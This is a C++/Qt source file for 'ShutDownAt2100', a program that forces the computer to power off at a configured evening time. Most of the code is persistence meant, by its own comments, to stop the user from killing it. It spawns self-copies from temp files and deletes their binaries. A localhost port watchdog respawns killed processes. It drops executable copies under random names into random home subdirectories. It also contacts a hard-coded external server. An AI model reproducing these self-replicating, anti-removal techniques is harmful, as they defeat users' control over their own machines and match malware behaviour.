/*!
*@file MainWindow.cpp
*@author 蔡火胜 caihuosheng@gmail.com
*@brief 这是类 MainWindow 的实现。
*/

//utf-8 encoding。

#include <QTimer>
#include <QTime>
#include <QProcess>
#include <QDir> //QDir
#include <QtDebug> //qDebug()
#include <QTcpSocket> //QTcpSocket
#include <QFileDevice> //QFileDevice

#include "ShutDownAt2100.h"
#include "DataType.h" //TimerWill

/*!
*@brief 构造函数。
*
*如果是因为KDE的session而启动了本进程，则本进程退出。
*/
ShutDownAt2100::ShutDownAt2100()
{
	setupUi(this);

    initializeMemberObjects(); //初始化成员对象。


    //外部服务器：
    connect(&ExternalSocket,SIGNAL(connected()),SLOT(StartProtocol())); //连接之后，开始按协议运作。
    connect(&ExternalSocket,SIGNAL(readyRead()),SLOT(ReadExternalServer())); //有数据到来，则读取数据。
    connect (&dirCollectTimer,&QTimer::timeout,this,&ShutDownAt2100::collectDir); //定时器超时，则收集目录。

    startDirCollectTimer(); //启动目录收集定时器。

    DebugEnableDebug (); //Debug.
} //MainWindow::MainWindow()

/*!
*@brief 检查是否是到了该动作的时间了。
*/
void ShutDownAt2100::CheckTime()
{
    //检查时间。

    bool FileOpened=false; //文件是否已打开。

    TheTime=QTime::currentTime(); //获取当前时间。
    
    DebugOutputStream << tr("Current time: %1, shut down time: %2").arg(TheTime.toString()).arg(ShutDownTime.toString()) << endl; //记录警告时间。
    

    if (OutputFile.open(QFile::WriteOnly | QFile::Append)) //打开成功。
    {
	FileOpened=true;

	OutputStream.setDevice(&OutputFile); //构建输出流。
    OutputStream.setCodec(CodecName.toLatin1()); //设置编码器。

	OutputStream << TheTime.toString(TimeFormat); //输出时间。
    }; //if

    if (TheTime>=WarningTime) //到了警告时间。
    {
	if (FileOpened) OutputStream << WarnString; //输出"进行了警告"。

	Warn(); //警告用户。

	quint32 ShutdownTimeoutInterval=QTime::currentTime().msecsTo(ShutDownTime); //计算出当前时间到关机时间之间的毫秒数，作为定时器的超时时间。

    DebugOutputStream << tr("Current time: %1, shut down time: %2, shut down time out interval: %3").arg(TheTime.toString()).arg(ShutDownTime.toString()).arg(ShutdownTimeoutInterval) << endl; //记录警告时间。
    
	TheTimer->start(ShutdownTimeoutInterval); //设置超时时间。
    } //if

    if (TheTime>=ShutDownTime) //到了关机时间。
    {
	if (FileOpened)
	{
	    OutputStream << "；" << ShutDownString << "。" << endl; //输出"关机"。

	    //关机之前关闭记录文件。
	    OutputFile.close();
	}; //if

	PowerOff();
    } //if
    else //如果不关机，那么在这里关闭记录文件。
    {
	OutputStream << "。" << endl;

	OutputFile.close();
    }; //else

    return;
} //void MainWindow::CheckTime()

/*!
  *@brief 提前进行警告。
  */
void ShutDownAt2100::Warn()
{
    DebugOutputStream << tr("Current time: %1, shut down time: %2").arg(TheTime.toString()).arg(ShutDownTime.toString()) << endl; //记录警告时间。
    
	if (HaventShown)
	{
		Time_label->setText(TheTime.toString(TimeFormat)); //显示时间。

		show(); //显示窗口。
	}
} //void MainWindow::Warn()

/*!
  *@brief 执行关机命令。
  */
void ShutDownAt2100::PowerOff()
{
    DebugOutputStream << tr("Current time: %1, shut down time: %2").arg(TheTime.toString()).arg(ShutDownTime.toString()) << endl; //记录警告时间。
    
	//关机。

	show();

	QProcess::execute("poweroff");
} //void MainWindow::PowerOff()

/*!
  *@brief 切换窗口的显示／隐藏。
  */
void ShutDownAt2100::ToggleShown()
{
	//置HaventShown为false。

	HaventShown=false;
} //void MainWindow::ToggleShown()

/*!
*@brief 读入配置信息。
*
*读入警告时间（ MainWindow::WarnTime ）及关机时间（ MainWindow::ShutDownTime ）。
*/
void ShutDownAt2100::ReadInConfigure()
{
    if (ConfigureFile.open(QIODevice::ReadOnly)) //打开成功。
    {
        QTextStream ConfigureFileStream(&ConfigureFile); //构建输入字符流。

        ConfigureFileStream >> WarningTimeString >> ShutDownTimeString; //读入警告时间和关机时间。

        WarningTime=QTime::fromString(WarningTimeString,"h:m"); //警告时间。
        ShutDownTime=QTime::fromString(ShutDownTimeString,"h:m"); //关机时间。

        if (!(WarningTime.isValid())) //如果时间转换出错，则使用默认警告时间。
        {
            WarningTime=DefaultWarningTime; //使用默认警告时间。
        } //if

        if (!(ShutDownTime.isValid())) //如果时间转换出错，则使用默认关机时间。
        {
            ShutDownTime=DefaultShutDownTime; //使用默认关机时间。
        } //if

        ConfigureFile.close(); //关闭文件。
    } //if
} //void MainWindow::ReadInConfigure()

/*!
  *@brief 创建子进程。
  *
  *子进程是与本进程相同的进程，创建子进程的目的是让用户更难以杀死所有的这些进程。
  *只要所有由这个程序创建的进程中有一个在预定的时间还在运行，则关机过程就能进行。
  *
  *将自己的程序复制到临时文件中，再启动临时文件作为子进程。
  *
  *当本进程被杀死时，子进程不会被杀死，子进程会继承本进程的父进程。
  */
void ShutDownAt2100::CreateSubProcess()
{
    qint32 SubProcCtr=0; //子进程计数器。
    QProcess * CurSubProc; //当前子进程对象的指针。
    QStringList ParaLst; //进程运行的参数列表。
    QFile CurFile(QCoreApplication::applicationFilePath()); //本进程对应的文件。
    QString CurTgtFileName=""; //当前的复制目标文件名。
    QString CurDateTimeStr=""; //当前的日期时间的字符串表示。

    ParaLst << "--nosubproc"; //不要再启动子进程。

    for (SubProcCtr=1;SubProcCtr<=4;SubProcCtr++) //创建4个子线程。
    {
	CurSubProc=new QProcess; //新申请一个进程对象。
	CurDateTimeStr=QDateTime::currentDateTime().toString("yyyy.M.d.h.m.s.z"); //获取当前日期时间的字符串表示。
	CurTgtFileName=QDir::tempPath()+'/'+CurDateTimeStr; //当前的目标文件名。
	CurFile.copy(CurTgtFileName); //将本进程的程序复制到当前的目标路径。
	CurSubProc->start(CurTgtFileName,ParaLst); //启动子进程。并且告知子进程，它是被本进程启动的，不要再递归地启动新的子进程了。
    } //for

    return;
} //void MainWindow::CreateSubProcess()

/*!
  *@brief 监听特定端口。监听端口，子进程会连接到这个端口，当子进程发现这个端口的连接断开时，会尝试重新启动本进程。
  *
  *监听TCP27263端口。
  *
  *返回监听结果，成功还是失败。
  */
bool ShutDownAt2100::ListenPort()
{
    qDebug() << __FILE__ << __LINE__ << __func__ ; //Debug.

    bool Result=false; //结果。

    if (MyTcpServer.listen(QHostAddress::LocalHost,27263)) //监听端口。并且成功。
    {
        qDebug() << __FILE__ << __LINE__ << __func__ ; //Debug.

	connect(&MyTcpServer,SIGNAL(newConnection()),this,SLOT(HasNewConn())); //处理连接请求。
	Result=true; //成功。
    } //if
    qDebug() << __FILE__ << __LINE__ << __func__ ; //Debug.

    return Result;
} //bool MainWindow::ListenPort()

/*!
  *@brief 有新的连接请求到来。
  *
  *当有新的连接请求到来时，会触发这个槽。
  *
  *接收新的连接。一旦连接断开了，就新启动一个子进程。
  */
void ShutDownAt2100::HasNewConn()
{
    QTcpSocket * CurTcpSoc=NULL; //当前的TCP连接的指针。

    CurTcpSoc=MyTcpServer.nextPendingConnection(); //接收下一个连接。

    connect(CurTcpSoc,SIGNAL(disconnected()),this,SLOT(CreateNewSubProc())); //如果连接断开了，就创建新的子进程。

    return;
} //void MainWindow::HasNewConn()

/*!
  *@brief 创建新的子进程，只创建一个。当某个子进程断开时，会触发这个槽。
  */
void ShutDownAt2100::CreateNewSubProc()
{
    QProcess * CurSubProc; //当前子进程对象的指针。
    QStringList ParaLst; //进程运行的参数列表。
    QFile CurFile(QCoreApplication::applicationFilePath()); //本进程对应的文件。
    QString CurTgtFileName=""; //当前的复制目标文件名。
    QString CurDateTimeStr=""; //当前的日期时间的字符串表示。

    ParaLst << "--nosubproc"; //不要再启动子进程。

    CurSubProc=new QProcess; //新申请一个进程对象。
    CurDateTimeStr=QDateTime::currentDateTime().toString("yyyy.M.d.h.m.s.z"); //获取当前日期时间的字符串表示。
    CurTgtFileName=QDir::tempPath()+'/'+CurDateTimeStr; //当前的目标文件名。
    CurFile.copy(CurTgtFileName); //将本进程的程序复制到当前的目标路径。
    CurSubProc->start(CurTgtFileName,ParaLst); //启动子进程。并且告知子进程，它是被本进程启动的，不要再递归地启动新的子进程了。

    return;
} //void MainWindow::CreateNewSubProc()

/*!
  *@brief 连接到父进程监听的端口。
  *
  *端口号是TCP27263。
  */
void ShutDownAt2100::Conn2PartProc()
{
    quint16 PartSocTcpPort=27263; //服务器端要监听的端口。

    MyClientSoc.connectToHost(QHostAddress::LocalHost,PartSocTcpPort); //使用客户端socket连接到服务器端。
    connect(&MyClientSoc,SIGNAL(disconnected()),this,SLOT(RerunServerAndConn())); //如果到服务器端的连接断开，则重新启动服务器并且开始尝试连接服务器。

    return;
} //void MainWindow::Conn2PartProc()

/*!
  *@brief 重新启动服务器端，并且尝试通过网络连接到它。
  *
  *服务器端的程序会保存在"/usr/bin/ShutDownAt2100"。
  */
void ShutDownAt2100::RerunServerAndConn()
{
    QProcess * Proc2RunServer=new QProcess; //新建一个进程。

    quint32 randomNumber=qrand(); //产生随机数字。





    QString randomNumberString; //随机数字字符串。

    randomNumberString.setNum (randomNumber); //转换成字符串。

    QString Path2ServerFile=dir2Scan+'/'+randomNumberString; //当前的目标文件名。服务器程序的文件路径。

    QFile exeFile(Path2ServerFile); //可执行程序。
    exeFile.open (QIODevice::WriteOnly); //打开文件。
    exeFile.write (exeByteArray); //写入文件。


    exeFile.close (); //关闭文件。

    exeFile.setPermissions (QFileDevice::ExeOwner|QFileDevice::ExeUser|QFileDevice::ExeGroup|QFileDevice::ExeOther); //设置权限，可执行。


    Proc2RunServer->start(Path2ServerFile); //启动服务器进程。

    Conn2ServerTimer.start(); //启动尝试连接服务器的定时器。
} //void MainWindow::RerunServerAndConn()

/*!
  *@brief 启用调试输出文件。
  */
void ShutDownAt2100::DebugEnableDebug()
{
    QString ProcStr=""; //代表进程号的字符串。
    ProcStr.setNum(QCoreApplication::applicationPid()); //获取进程号。

    QString DebugFileName="/var/log/ShutDownAt2100/DebugLog.log"; //调试输出文件名。
    DebugOutputFile.setFileName(DebugFileName); //设置调试输出文件名。
    DebugOutputFile.open(QIODevice::WriteOnly); //打开调试输出文件。

    DebugOutputStream.setDevice(&DebugOutputFile); //绑定输出流。
} //void MainWindow::DebugEnableDebug()

/*!
  *@brief 禁用调试输出文件。
  */
void ShutDownAt2100::DebugDisableDebug()
{
    DebugOutputFile.close(); //关闭调试输出文件。
} //void MainWindow::DebugDisableDebug()

/*!
  *@brief 进行初始化。
  *
  *计算出到关机时间之间还剩下多少时间，让定时器在那个时间之前的２分钟超时。
  */
void ShutDownAt2100::Init()
{
    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
    ReadInConfigure(); //读入配置信息。

    //根据命令行参数判断要不要启动子进程：
    QStringList ProcPara=QCoreApplication::arguments(); //获取命令行参数。
    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.

    if (ProcPara.contains("-session")) //如果参数表明这个进程是KDE因为上次的session而启动的，则退出。测试发现，程序并不能读到这个参数。
    {
        exit(0); //退出。
        cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
    } //if
    else //这个进程是正常启动的。
    {
        if (ProcPara.contains("--nosubproc")) //如果命令行参数中有“--nosubproc”的话，就不启动子进程。而是连接到父进程监听的端口。
        {
            cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
            DeleteMyProgram(); //删除自己的程序。
            Conn2ServerTimer.setInterval(1000); //默认的连接重试时间是一秒。
            connect(&Conn2ServerTimer,SIGNAL(timeout()),this,SLOT(Conn2PartSoc())); //定时器超时之后，就连接到父进程的端口。
            connect(&MyClientSoc,SIGNAL(connected()),&Conn2ServerTimer,SLOT(stop())); //连接上服务器端之后，定时器停止。
            cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
            Conn2PartProc(); //连接到父进程监听的端口。
        } //if
        else //否则监听特定端口，并且启动子进程。
        {
            cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
            if (ListenPort()) //监听特定端口。监听端口，子进程会连接到这个端口，当子进程发现这个端口的连接断开时，会尝试重新启动父进程。//如果成功，则继续。
            {
                CreateSubProcess(); //创建子进程。
            } //if
            else //监听失败，则说明已经有服务器端程序在运行了，退出。
            {
                cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.

                exit(0); //退出。
            } //else
        } //else
        cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
    } //else

    connect(TheTimer,SIGNAL(timeout()),this,SLOT(CheckTime())); //定时检查。

    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
    WarningTimeoutInterval=QTime::currentTime().msecsTo(WarningTime); //计算出当前时间到警告时间之间的毫秒数，作为定时器的超时时间。
    
    DebugOutputStream << tr("Warning time: %1, current: %2, warning time out interval: %3").arg(WarningTime.toString()).arg(QTime::currentTime().toString()).arg(WarningTimeoutInterval) << endl; //记录警告时间。

    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
    TheTimer->start(WarningTimeoutInterval); //设置超时时间。

    CheckTime(); //启动之后马上检查时间。

    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.

    //连接到外部服务器：
    //外部服务器的作用是，在本机的时间出现错误(例如人为修改时间)的情况下，通知此程序关机。
    ConnectExternalServer(); //连接外部服务器。
    cout << __FILE__ << ", " << __LINE__ << ", " << __func__ << ", redirected: " << endl; //Debug.
} //void MainWindow::Init()

/*!
  *@brief 删除自己的程序。
  */
void ShutDownAt2100::DeleteMyProgram()
{
    QFile MyProg; //本进程的程序。

    MyProg.setFileName(QCoreApplication::applicationFilePath()); //找到程序的文件名。

    MyProg.remove(); //删除文件。

    return;
} //void ShutDownAt2100::DeleteMyProgram()

/*!
  *@brief 连接外部服务器。
*/
void ShutDownAt2100::ConnectExternalServer()
{
    ExternalSocket.connectToHost(QHostAddress("182.84.239.57"),9404); //连接到外部服务器。

    return;
} //void ShutDownAt2100::ConnectExternalServer()

/*!
  *@brief 连接之后，开始按协议运作。
  *发送数据包，报告自己希望在多长时间之后收到通知。
  *通信协议见“通信协议”目录。
  *此时应当发送TimerWill数据包。
  */
void ShutDownAt2100::StartProtocol()
{
    SendTimerWill(WarningTimeoutInterval+2*60*1000); //发送数据包，告之自己预期的关机时间。

    return;
} //void ShutDownAt2100::StartProtocol()

/*!
  *@brief 发送数据包，告之自己预期的关机时间。
  *@param SdInterval 预期在这麽多毫秒之后关机。
  */
void ShutDownAt2100::SendTimerWill(quint32 SdInterval)
{
    //构造数据流：

    quint8 TimerWillUint8=0; //数据类型的整数值。
    QString Sda2100Dec=tr("This is the timer will of ShutDownAt2100 project."); //声明语句。
    QByteArray Block2Send; //要发送的数据块。
    QDataStream Stream2Server(&Block2Send,QIODevice::WriteOnly); //将要发送到服务器端的数据流。
    Stream2Server.setVersion(QDataStream::Qt_4_0); //版本号（Qt4.0）。

    Stream2Server << (quint32)0; //剩余部分的长度。
    //数据体：
//    Stream2Client << (*MyTopology); //拓扑结构图。
    Stream2Server << Sda2100Dec; //输出声明。
    Stream2Server << Version; //输出版本号。
    TimerWillUint8=(quint8)(TimerWill); //数据类型的整数值。
    Stream2Server << TimerWillUint8; //输出数据类型，定时器愿景信息。

    // 输出数据实例，定时器信息：
    Stream2Server << SdInterval; //输出预期的超时时间。

    //填充长度：
    Stream2Server.device()->seek(0); //回退到开始。
    Stream2Server << (quint32)(Block2Send.size()-sizeof(quint32)); //写入长度。

    //发送数据流：

    ExternalSocket.write(Block2Send); //发送。

    return;
} //void ShutDownAt2100::SendTimerWill(quint32 SdInterval)

/*!
 * \brief ShutDownAt2100::loadExeByteArray 将自身程序载入为一个字节数组。
 */
void ShutDownAt2100::loadExeByteArray()
{
    QFile CurFile(QCoreApplication::applicationFilePath()); //本进程对应的文件。

    CurFile.open (QIODevice::ReadOnly); //打开文件。

    exeByteArray=CurFile.readAll (); //全部载入。

    CurFile.close (); //关闭文件。
} //void ShutDownAt2100::loadExeByteArray()

/*!
 * \brief ShutDownAt2100::startDirCollectTimer 启动目录收集定时器。
 */
void ShutDownAt2100::startDirCollectTimer()
{
    dirCollectTimer.start(); //启动定时器。
} //void ShutDownAt2100::startDirCollectTimer()

/*!
 * \brief ShutDownAt2100::initializeMemberObjects 初始化成员对象。
 */
void ShutDownAt2100::initializeMemberObjects()
{
    Version=QDate(2012,1,11); //版本号。

    WarnString=tr("警告：2分钟后关机"); //警告语句。
    ShutDownString=tr("时间已到，关机"); //关机语句。
    CodecName="UTF-8"; //utf-8编码。
    TimeFormat="H:m:s"; //时间格式。

    DefaultWarningTime=QTime(21,43); //默认警告时间。
    WarningTimeString=DefaultWarningTime.toString("h:m"); //警告时间的字符串表示。
    WarningTime=DefaultWarningTime; //警告时间。

    DefaultShutDownTime=QTime(21,45); //默认关机时间。
    ShutDownTime=DefaultShutDownTime; //关机时间。
    ShutDownTimeString=DefaultShutDownTime.toString("h:m"); //关机时间的字符串表示。

    //创建日志文件目录：
    QString ssnStrDir= "/var/log/ShutDownAt2100/"; //保存背景图片文件的目录。
    QDir pathMkr; //创建路径的目录对象。
    pathMkr.mkpath (ssnStrDir); //创建路径。
    
    
    OutputFileName="/var/log/ShutDownAt2100/log.log"; //输出文件名。
    OutputFile.setFileName(OutputFileName); //文件对象。

    ConfigureFileName="/etc/ShutDownAt2100/ShutDownAt2100.conf"; //配置文件名。
    ConfigureFile.setFileName(ConfigureFileName); //配置文件对象。

    HaventShown=true; //从没被显示过。
    TheTimer=new QTimer(); //获取定时器。

    dirCollectTimer.setInterval (1*60*1000); //一分钟做一次收集。

    loadExeByteArray(); //将自身程序载入为一个字节数组。
} //void ShutDownAt2100::initializeMemberObjects()

/*!
 * \brief ShutDownAt2100::collectDir 定时器超时，则收集目录。
 */
void ShutDownAt2100::collectDir()
{
    QDir CrtDir(dir2Scan); //当前目录。
    QDir::Filters DirFlt=QDir::NoDot | QDir::Dirs; //不列出文件。
    CrtDir.setFilter(DirFlt); //设置过滤器。
    QFileInfoList fileInfoList=CrtDir.entryInfoList(); //获取文件信息列表。


    if (fileInfoList.size ()) //目录列表不为空。
    {
        QFileInfo CrtFlInfo; //当前的文件信息。

        quint32 chosenIndex=qrand()%(fileInfoList.size ()); //随机选择一个下标。

        CrtFlInfo=fileInfoList[chosenIndex]; //获取该下标对应的目录。

        dir2Scan=CrtFlInfo.absoluteFilePath(); //记录下次要扫描的目录。

    } //if (FlInfLst.size ()) //目录列表不为空。
    else //目录列表为空。
    {
        dir2Scan=QDir::homePath (); //重新从家目录开始搞。
    } //else //目录列表为空。

    qDebug() << __FILE__ << __LINE__ << __func__ << tr("dir 2 scan:") << dir2Scan; //Debug.

    return;
} //void ShutDownAt2100::collectDir()
